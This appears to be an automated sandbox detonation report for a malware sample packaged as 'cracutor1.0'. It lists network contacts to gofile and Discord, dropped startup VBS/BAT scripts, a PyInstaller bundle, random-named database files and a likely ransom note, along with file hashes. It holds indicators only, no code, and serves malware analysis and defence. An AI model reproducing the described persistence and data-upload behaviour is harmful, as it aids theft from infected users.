US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 8.8.8.8:53 store9.gofile.io udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 239.190.168.206.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp

Files

memory/4224-0-0x00007FFC70633000-0x00007FFC70635000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wtpccnc4.vyz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4224-1-0x00000241D7420000-0x00000241D7442000-memory.dmp

memory/4224-11-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

memory/4224-12-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

memory/4224-13-0x00000241D7480000-0x00000241D7488000-memory.dmp

memory/4224-14-0x00000241E1980000-0x00000241E1B8A000-memory.dmp

memory/1252-25-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

memory/1252-26-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

memory/1252-27-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

memory/1252-30-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ee6f5f5e5924783870aeedeccdafe9da
SHA1 0e12ede20df5ec37f2bf3608ad1bc9b4649450fd
SHA256 ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416
SHA512 998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f

C:\Users\Admin\AppData\Roaming\startup_str_863.vbs

MD5 46ecfea8ca77a5ea8761e315d86a0acf
SHA1 9d3335c8ceea2de5440b7a1b0dfcb9b504c76fc5
SHA256 7412fe1fa18a3dd64d8bf77e7715957d91c3d1a65b90906969dfccfe9ba663d1
SHA512 eb61425b5501bb72bcb48801d7e38ceaaad56d9c8fd522976a577cd6058e7897748661437e57ece47c63ee8b9cc1553991552fc19f0d9a3e381b64cc7766586e

C:\Users\Admin\AppData\Roaming\startup_str_863.bat

MD5 5f2ca709edfb4aab62c0d293fc078a8d
SHA1 e0ee77775465e261c7e0f48643c6d66af21841c2
SHA256 5edd619490ce715b05fa88acb9865fa2c290949483b5813f70083d4480e4bf05
SHA512 833edd2aadcd390eeb9e264bdcbb790fa013b3141a5e092ed4f23b819903f6fce0edd68e337dd8801bc3529b80521b2aeddf06f245a6df37d1a3b2af97d41eaf

memory/928-51-0x0000024BA5380000-0x0000024BA5394000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe

MD5 03d0c69e31fd77718e661722361c0a5c
SHA1 04e02539771963a628477f6546be48d2d912a612
SHA256 255834540df95d84167a197acc6e70d9b80baa5dc15ddb16060508be498f1e78
SHA512 94ed7ee2ad72a4b80fc9121483c5b95ad2a1036b3a20f60499d59cc1255635bcade467952b828a3b27415ddd799c8b3a89476bc0f34726292f6632249fa0d986

memory/4852-62-0x0000000000CB0000-0x0000000000EAE000-memory.dmp

memory/4224-63-0x00007FFC70630000-0x00007FFC710F1000-memory.dmp

memory/4852-65-0x0000000005A80000-0x0000000005B1E000-memory.dmp

memory/4852-66-0x0000000005EE0000-0x0000000005F72000-memory.dmp

memory/4852-64-0x0000000006030000-0x00000000065D4000-memory.dmp

memory/4852-69-0x0000000005ED0000-0x0000000005EDE000-memory.dmp

memory/4852-68-0x0000000005FC0000-0x0000000005FF8000-memory.dmp

memory/4852-67-0x0000000005EB0000-0x0000000005EB8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d42b6da621e8df5674e26b799c8e2aa
SHA1 ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a7cc007980e419d553568a106210549a
SHA1 c03099706b75071f36c3962fcc60a22f197711e0
SHA256 a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165
SHA512 b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34f595487e6bfd1d11c7de88ee50356a
SHA1 4caad088c15766cc0fa1f42009260e9a02f953bb
SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

memory/928-121-0x0000024B82950000-0x0000024B8295E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\idcljz.exe

MD5 5076e1777bdc18710ed70c27b96a95db
SHA1 cb24ad63bd9598bccf46e64b576144b2e5be7d53
SHA256 73d2131cdc04f4751f9c6911607a76192bd5e440ec597291cba1acb1aba8f201
SHA512 8d931a5dc1e4cfd7e0876e6f35ba8a2756a44957f746b3c996d6753f089ef127557e483ff434aa2861ae12071a4a68c3eafcacd5930e5f1234fb91831cc67de9

C:\Users\Admin\AppData\Local\Temp\_MEI13922\python310.dll

MD5 384349987b60775d6fc3a6d202c3e1bd
SHA1 701cb80c55f859ad4a31c53aa744a00d61e467e5
SHA256 f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8
SHA512 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

memory/928-223-0x0000024BA5900000-0x0000024BA5A20000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI13922\base_library.zip

MD5 e390f6f8210ec8f625e41d032892a555
SHA1 1942cd3974970e436f51d08284d216af91bd563f
SHA256 072a34a29da732afb01237adcc33198842edd473d014cf6b7f0ee3285f8b42d4
SHA512 b577eee901ce55fcc63403caa782a6f36dc20c18894508f78cac7d0d03c5ce0771bd4671525d7f0b5a86bf0afe0b09afea38d4e07767a8154ccc8cc27b3a295b

C:\Users\Admin\AppData\Local\Temp\_MEI13922\python3.DLL

MD5 a5471f05fd616b0f8e582211ea470a15
SHA1 cb5f8bf048dc4fc58f80bdfd2e04570dbef4730e
SHA256 8d5e09791b8b251676e16bdd66a7118d88b10b66ad80a87d5897fadbefb91790
SHA512 e87d06778201615b129dcf4e8b4059399128276eb87102b5c3a64b6e92714f6b0d5bde5df4413cc1b66d33a77d7a3912eaa1035f73565dbfd62280d09d46abff

C:\Users\Admin\AppData\Local\Temp\_MEI13922\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_lzma.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\select.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_queue.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_socket.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_uuid.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_ssl.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_sqlite3.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_overlapped.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_multiprocessing.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_hashlib.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_decimal.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_cffi_backend.cp310-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_brotli.cp310-win_amd64.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_asyncio.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\VCRUNTIME140_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI13922\unicodedata.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\sqlite3.dll

C:\Users\Admin\AppData\Local\Temp\_MEI13922\pyexpat.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\libssl-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI13922\libcrypto-1_1.dll

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_bz2.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\_ctypes.pyd

C:\Users\Admin\AppData\Local\Temp\_MEI13922\VCRUNTIME140.dll

C:\Users\Admin\AppData\Local\Tempcroirmokfr.db

C:\Users\Admin\AppData\Local\Tempcrjmuyfijo.db

C:\Users\Admin\AppData\Local\Tempcriqbtcknr.db

C:\Users\Admin\AppData\Local\Tempcruwuqkjxi.db

C:\Users\Admin\AppData\Local\Tempcrxigiyirb.db

C:\Users\Admin\AppData\Local\Tempcrssiycfnb.db

memory/928-355-0x0000024BC61B0000-0x0000024BC6500000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240221-en

Max time kernel

120s

Max time network

121s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\123.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description  Indicator  Process                          Target
N/A          N/A        C:\Windows\system32\NOTEPAD.EXE  N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\123.txt"

Network

N/A

Files

N/A